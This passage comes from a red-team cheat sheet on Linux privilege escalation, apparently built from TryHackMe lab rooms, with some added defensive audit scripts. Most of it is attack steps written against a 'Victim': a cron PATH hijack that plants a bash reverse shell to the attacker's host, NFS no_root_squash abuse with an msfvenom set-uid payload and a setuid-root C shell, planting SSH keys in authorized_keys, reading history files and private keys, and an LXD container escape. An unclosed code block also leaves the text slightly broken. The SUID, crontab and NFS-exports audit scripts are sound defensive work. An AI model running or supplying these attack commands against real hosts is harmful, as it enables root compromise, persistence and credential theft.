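# Constructed sandbox standing in for a host's filesystem (not real paths).
ROOT=$(mktemp -d)
mkdir -p "$ROOT/usr/bin" "$ROOT/tmp"
for f in "$ROOT/usr/bin/passwd" "$ROOT/usr/bin/sudo"; do
    : > "$f"
    chmod 4755 "$f"                 # legitimate set-uid binaries
done
: > "$ROOT/usr/bin/wall"
chmod 2755 "$ROOT/usr/bin/wall"     # legitimate set-gid binary
: > "$ROOT/usr/bin/ls"
chmod 0755 "$ROOT/usr/bin/ls"       # ordinary binary, must not be listed

# Take the baseline while the tree is in its known-good state.
BASELINE=$(mktemp)
suid_inventory "$ROOT" > "$BASELINE"

# Simulate the end state of the NFS technique on this page: a set-uid file
# dropped into a world-writable directory after the baseline was taken.
: > "$ROOT/tmp/shell.elf"
chmod 4755 "$ROOT/tmp/shell.elf"

# Stand-alone run: the report names only the new file.
new_suid_files "$BASELINE" "$ROOT"
```

The same baseline-and-diff approach works for the `getcap -r /` output in the next section: capabilities that appear on a binary after the baseline was taken deserve the same scrutiny as a new SUID bit.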

## Getcap

**Victim**

```
getcap -r / 2>/dev/null
```

| Finding | Comments                                                                                                                                                                                                             | Examples                                                                                                                                                                                                                                                       |
| ------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| python  | If the binary has the Linux `CAP_SETUID` capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. | [oh-my-webserver](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/oh-my-webserver "mention")[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention") |
| vim     | Can spawn shell                                                                                                                                                                                                      | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention")                                                                                                              |
| perl    | Can spawn shell                                                                                                                                                                                                      | [wonderland](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wonderland "mention")                                                                                                                                              |
| openssl | Can spawn shell                                                                                                                                                                                                      | [mindgames](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/mindgames "mention")                                                                                                                                                |
| ruby    |                                                                                                                                                                                                                      | [#initial-shell](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/empline#initial-shell "mention")                                                                                                                               |

## **Service Exploits**

| Finding | Comments | Examples                                                                                                                                     |
| ------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------- |
| mysql   |          | [#service-exploits](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#service-exploits "mention") |

## PATH Variables

**Examples**

[hacker-vs.-hacker](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hacker-vs.-hacker "mention")

[#exploiting-crontab](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/common-linux-privesc#exploiting-crontab "mention")

Look at the PATH line. Below is an example of a cron job whose PATH searches /home/lachlan/bin before /bin and /usr/bin. Because the cron job calls pkill without its full path, we can shadow it: a new file at /home/lachlan/bin/pkill containing whatever we want will be found first and run as root.

**Victim**

```
cat /etc/crontab
```

Other places where cron jobs may be defined:

**Victim**

```
cat /etc/cron.d/*
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F2FefEkR2gqSDw7yUxhn2%2Fimage.png?alt=media&#x26;token=0aa7930c-ddae-42fc-a873-33178b7fcab6" alt=""><figcaption></figcaption></figure>

**Victim(lachlan)**

```
echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod +x /home/lachlan/bin/pkill
```

### **Add path**

**Example**

[#exploiting-path-variable](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/common-linux-privesc#exploiting-path-variable "mention")

If a cron job does not specify the full path of a command, we may be able to change PATH so the lookup resolves to a different file.

Before we change the PATH, we can see that ls resolves to /bin/ls.

![](https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F6ziKINzlfR0PuCmZwwc9%2Fimage.png?alt=media\&token=65e3cad3-9867-4241-b8b6-80242b0a8580)

After running the command below, ls resolves to our script in /tmp instead.

**Victim**

```
export PATH=/tmp:$PATH
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FOVYB2HFwYJBpFwDOIMNb%2Fimage.png?alt=media&#x26;token=d9e9bd8f-50ae-441f-b45a-e1deff277529" alt=""><figcaption></figcaption></figure>
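The two PATH cases above (a cron PATH that lists a user-writable directory first, and a command written without its full path) are one condition seen from two sides, so one added audit script serves both. It is not the page's or the room's code: it parses a system crontab, walks its PATH in lookup order for every unqualified command, and flags a command whenever a directory a non-root user could write to (or create) is reached before the directory that really holds the binary. The crontab text, the directory tree and the stub `pkill`/`ls` binaries are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example, not part of the original page: audit a system crontab for
# the PATH-hijack condition. A root cron entry is hijackable when the
# command is written without a path AND, walking the crontab's PATH in
# order, a directory a non-root user can write to (or create) comes before
# the directory that really holds the command.

# The PATH a crontab runs under: its own PATH= line, else cron's default.
crontab_path() {
    p=$(sed -n 's/^[[:space:]]*PATH[[:space:]]*=[[:space:]]*//p' "$1" | tr -d '"' | head -n 1)
    printf '%s\n' "${p:-/usr/bin:/bin}"
}

# Commands that cron will resolve through PATH: entries whose command word
# has no slash. Handles "m h dom mon dow user cmd" and "@reboot user cmd".
unqualified_commands() {
    awk '
        /^[[:space:]]*#/ { next }                                   # comment
        NF == 0 { next }                                            # blank
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=/ { next } # VAR=value
        { cmd = ($1 ~ /^@/) ? $3 : $7 }
        cmd != "" && cmd !~ /\// { print cmd }
    ' "$1"
}

# True when a non-root user could place a file in $1: the directory is
# missing, or it is group- or world-writable.
user_can_plant_in() {
    [ ! -d "$1" ] || [ -n "$(find "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]
}

# Print "command<TAB>directory" for each PATH-resolved command that a
# plantable directory shadows. Prints nothing for a safe crontab.
audit_crontab() {
    path=$(crontab_path "$1")
    unqualified_commands "$1" | sort -u | while read -r cmd; do
        printf '%s\n' "$path" | tr ':' '\n' | while read -r dir; do
            if [ -z "$dir" ]; then
                continue
            elif user_can_plant_in "$dir"; then
                printf '%s\t%s\n' "$cmd" "$dir"
                break
            elif [ -x "$dir/$cmd" ]; then
                break   # genuine binary reached before any plantable directory
            fi
        done
    done
    return 0
}

# Constructed sandbox tree standing in for /, with stub binaries.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/bin" "$ROOT/usr/bin" "$ROOT/home/lachlan/bin"
for b in "$ROOT/bin/pkill" "$ROOT/bin/ls"; do : > "$b"; chmod 755 "$b"; done
chmod 755 "$ROOT/bin" "$ROOT/usr/bin"
chmod 777 "$ROOT/home/lachlan/bin"       # the user-writable directory

# Weak crontab: user directory first in PATH, commands given by bare name.
WEAK_CRON=$(mktemp)
cat > "$WEAK_CRON" <<EOF
SHELL=/bin/sh
PATH=$ROOT/home/lachlan/bin:$ROOT/bin:$ROOT/usr/bin
# m h dom mon dow user command
*/1 * * * * root pkill -f "somethinghttp"
0 3 * * *   root ls /var/backups
@reboot     root /usr/sbin/service apache2 start
EOF

# Hardened crontab: PATH holds only non-writable directories (root-owned on
# a real host), so the real binaries are reached first.
HARD_CRON=$(mktemp)
cat > "$HARD_CRON" <<EOF
SHELL=/bin/sh
PATH=$ROOT/bin:$ROOT/usr/bin
*/1 * * * * root pkill -f "somethinghttp"
0 3 * * *   root ls /var/backups
EOF

# Stand-alone run: findings for the weak file, nothing for the hardened one.
echo "weak crontab:";     audit_crontab "$WEAK_CRON"
echo "hardened crontab:"; audit_crontab "$HARD_CRON"
```

On a real host run `audit_crontab /etc/crontab` and each file in `/etc/cron.d/`. The `@reboot ... /usr/sbin/service` entry is never flagged because it is fully qualified, which is the cheapest fix: absolute paths in every cron entry, and a PATH that contains only root-owned, non-writable directories.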

## Passwords & Keys

### History Files

**Examples**

[#passwords-and-keys-history-files](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#passwords-and-keys-history-files "mention")

**Victim**

```
cat ~/.*history | less
```

### Config Files

**Examples**

[#passwords-and-keys-config-files](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#passwords-and-keys-config-files "mention")

**Victim**

```
cat /home/user/myvpn.ovpn
```

### SSH Keys

### Copy keys from Victim

**Examples**

[#passwords-and-keys-ssh-keys](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#passwords-and-keys-ssh-keys "mention")

Look for hidden files & directories in the system root.

**Victim**

```
cat /home/$USER/.ssh/$KEY
```

Copy the key over to your Kali box (it's easier to just view the contents of the $KEY file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it.

**Kali**

```
chmod 600 $KEY
ssh -i $KEY -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa $USER@$VICTIM
```

### **Add Keys to Victim**

**Examples**

[madeyes-castle](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/madeyes-castle "mention")

**Kali**

```
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FtHWgG131ect3W733Kw8q%2Fimage.png?alt=media&#x26;token=541d01bb-03cf-467a-a711-c020cd819365" alt=""><figcaption></figcaption></figure>

**Victim**

```
echo "$YOURKEY" >> /home/$USER/.ssh/authorized_keys
```

**Kali**

```
ssh $USER@$VICTIM
```

## NFS

**Examples**

[#nfs](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#nfs "mention")

[linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention")

[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")

### Option #1

Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.

Check the NFS share configuration on the Debian VM.

**Victim**

```
cat /etc/exports
```

no\_root\_squash is present

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYweinXUdvurOKrW1UXKN%2Fimage.png?alt=media&#x26;token=a666884f-6d11-44a4-8d23-f0cb69256859" alt=""><figcaption></figcaption></figure>

Note that the /tmp share has root squashing disabled.

On your Kali box, switch to your root user if you are not already running as root.

**Kali**

```
sudo su
```

Using Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly).

**Kali**

```
mkdir /tmp/nfs
mount -o rw,vers=3 $VICTIM:/tmp /tmp/nfs
```

Still using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash).

**Kali**

```
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
```

Still using Kali's root user, make the file executable and set the SUID permission.

**Kali**

```
chmod +xs /tmp/nfs/shell.elf
```

Back on the Debian VM, as the low privileged user account, execute the file to gain a root shell.

**Victim**

```
/tmp/shell.elf
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fv4X6snHC7E7BCexw40bY%2Fimage.png?alt=media&#x26;token=0f1cd807-b359-41b1-a917-008f3bc7398e" alt=""><figcaption></figcaption></figure>
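The decisive check in Option #1 is the `cat /etc/exports` step: the whole chain only works because the /tmp share is exported with no\_root\_squash. The script below is an added example, not code from the page or the room. It parses exports syntax (`/path client(options) client(options)...`) and prints every share/client pair that disables root squashing, so an administrator can run it across NFS servers; the exports files it reads are constructed inline, reusing the /tmp and /home/ubuntu/sharedfolder paths from this page as sample values.

```shell
#!/bin/sh
# Added example, not part of the original page: parse an /etc/exports file
# and report every share/client pair exported with no_root_squash, the
# option that lets a remote root create root-owned (and set-uid) files on
# the server. On a real host: no_root_squash_exports /etc/exports

# Print "path<TAB>client" for each client entry whose option list contains
# no_root_squash. Line format: /path client(opts) [client(opts) ...]
no_root_squash_exports() {
    awk '
        /^[[:space:]]*#/ { next }
        NF == 0 { next }
        {
            for (i = 2; i <= NF; i++) {
                n = split($i, part, "(")
                client = part[1]
                opts = (n > 1) ? part[2] : ""
                sub(/\)$/, "", opts)
                # Surround with commas so the match is on the whole option name.
                if (("," opts ",") ~ /,no_root_squash,/)
                    printf "%s\t%s\n", $1, client
            }
        }
    ' "$1"
}

# Exit 0 when no share disables root squashing, 1 otherwise.
exports_are_safe() {
    [ -z "$(no_root_squash_exports "$1")" ]
}

# Constructed sample exports file (not a real host's configuration). The
# /tmp line is the weak export the page describes; the sharedfolder line
# keeps the default root_squash implicitly, and the last line mixes both.
WEAK_EXPORTS=$(mktemp)
cat > "$WEAK_EXPORTS" <<'EOF'
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder 10.0.0.0/24(rw,sync,no_subtree_check)
/srv/export 10.0.0.5(ro,root_squash) 10.0.0.6(rw,no_root_squash)
EOF

# Hardened counterpart: the same shares with root squashing left on.
HARDENED_EXPORTS=$(mktemp)
cat > "$HARDENED_EXPORTS" <<'EOF'
/tmp *(rw,sync,root_squash,no_subtree_check)
/home/ubuntu/sharedfolder 10.0.0.0/24(rw,sync,no_subtree_check)
/srv/export 10.0.0.5(ro,root_squash) 10.0.0.6(rw,root_squash)
EOF

# Stand-alone run.
echo "weak:";     no_root_squash_exports "$WEAK_EXPORTS"
echo "hardened:"; no_root_squash_exports "$HARDENED_EXPORTS"
```

Server-side, removing no\_root\_squash (root\_squash is the default) is the fix; on the client side of such a share, mounting with `nosuid` stops a planted set-uid file from being honoured even if the server is misconfigured.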

### Option #2

**Victim**

```
showmount -e $VICTIM
cat /etc/exports
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNZy03bxVrmRU1jTZsv1A%2Fimage.png?alt=media&#x26;token=47aa19c6-b46b-44da-9939-8272a56a77c6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F0VebrRqF0MXiWRmufinK%2Fimage.png?alt=media&#x26;token=3b2b0950-ba65-41f6-b505-e2de20ee3332" alt=""><figcaption></figcaption></figure>

**Kali**

```
mkdir /root/attack
mount -o rw $VICTIM:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.c
```

**nfc.c**

```
#include <stdlib.h>
#include <unistd.h>

/* Once the file carries the SUID bit, these calls succeed and the shell runs as root. */
int main()
{
	setgid(0);
	setuid(0);
	system("/bin/bash");
	return 0;
}

**Kali**

```
gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfc
```

**Victim**

```
cd /home/ubuntu/sharedfolder
./nfc
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fh1nOsmJP9PzN7Tue2U5F%2Fimage.png?alt=media&#x26;token=4acf514d-3978-4e52-9ed0-f89f3550218d" alt=""><figcaption></figcaption></figure>

## Kernel Exploits

**Examples**

[#kernel-exploits](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#kernel-exploits "mention")

## Writable Files

**Files whose group permission bits include write**

```
find / -type f -perm /g=w -exec ls -l {} + 2> /dev/null 
```

```
find / -writable 2>/dev/null
```

## **Ports**

You may find listening ports that are only reachable from inside the host.

```
ss -ltp
netstat -tuan
```

### LXD

**Examples**

[anonymous](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/anonymous "mention")

[gamingserver](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/gamingserver "mention")

**Resources**

<https://www.hackingarticles.in/lxd-privilege-escalation/>

**Victim**

```
id
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FhqYK2XLllEvTWhQm0o4l%2Fimage.png?alt=media&#x26;token=d422247e-641f-425b-9110-c0aa98778139" alt=""><figcaption></figcaption></figure>

**Kali**

```
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
```

**Note:** The `lxd init` command was needed to resolve a storage pool issue; it may not always be required.

**Victim**

```
cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
```

## PolKit

**Examples:** [hip-flask](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hip-flask "mention")

Check whether polkit is installed and listed as upgradeable (an outdated package is the hint).

**Kali**

```
apt list --upgradeable
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FOlRscIy8exHETHpq0rL9%2Fimage.png?alt=media&#x26;token=8763318d-ded0-4bc7-aabb-fb20c76b4491" alt=""><figcaption></figcaption></figure>

Check out this room for more details

{% embed url="https://tryhackme.com/r/room/polkit" %}


## Monitor Processes

**Examples**

[enumeration](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/enumeration "mention")

**Victim**

```
ps axf
```

### PSPY

A tool that can monitor Linux processes without root access.

**Kali**

```
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81
```

**Victim**

```
wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 
```

## Docker Breakout / Privilege Escalation

{% embed url="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation" %}

**Examples**

[container-vulnerabilities](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hydra/container-vulnerabilities "mention")

[ultratech](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/ultratech "mention")

[dogcat](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/dogcat "mention")

[the-marketplace](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace "mention")

[chill-hack](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/chill-hack "mention")

[the-docker-rodeo](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-docker-rodeo "mention")

[the-great-escape](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-great-escape "mention")

[umbrella](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/umbrella "mention")

Copy Material from here:

<https://tryhackme.com/room/linprivesc>

## **Automated Enumeration Tools**

| Name                          | Link                                                                                            | Examples                                                                                                      |
| ----------------------------- | ----------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- |
| LinPeas                       | <https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS> | [internal](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/internal "mention") |
| LinEnum                       | <https://github.com/rebootuser/LinEnum>                                                         |                                                                                                               |
| LES (Linux Exploit Suggester) | <https://github.com/mzet-/linux-exploit-suggester>                                              |                                                                                                               |
| Linux Smart Enumeration       | <https://github.com/diego-treitos/linux-smart-enumeration>                                      |                                                                                                               |
| Linux Priv Checker            | <https://github.com/linted/linuxprivchecker>                                                    |                                                                                                               |

## Room with other things to try

<https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc>

## Other Cheat sheets

<https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics>
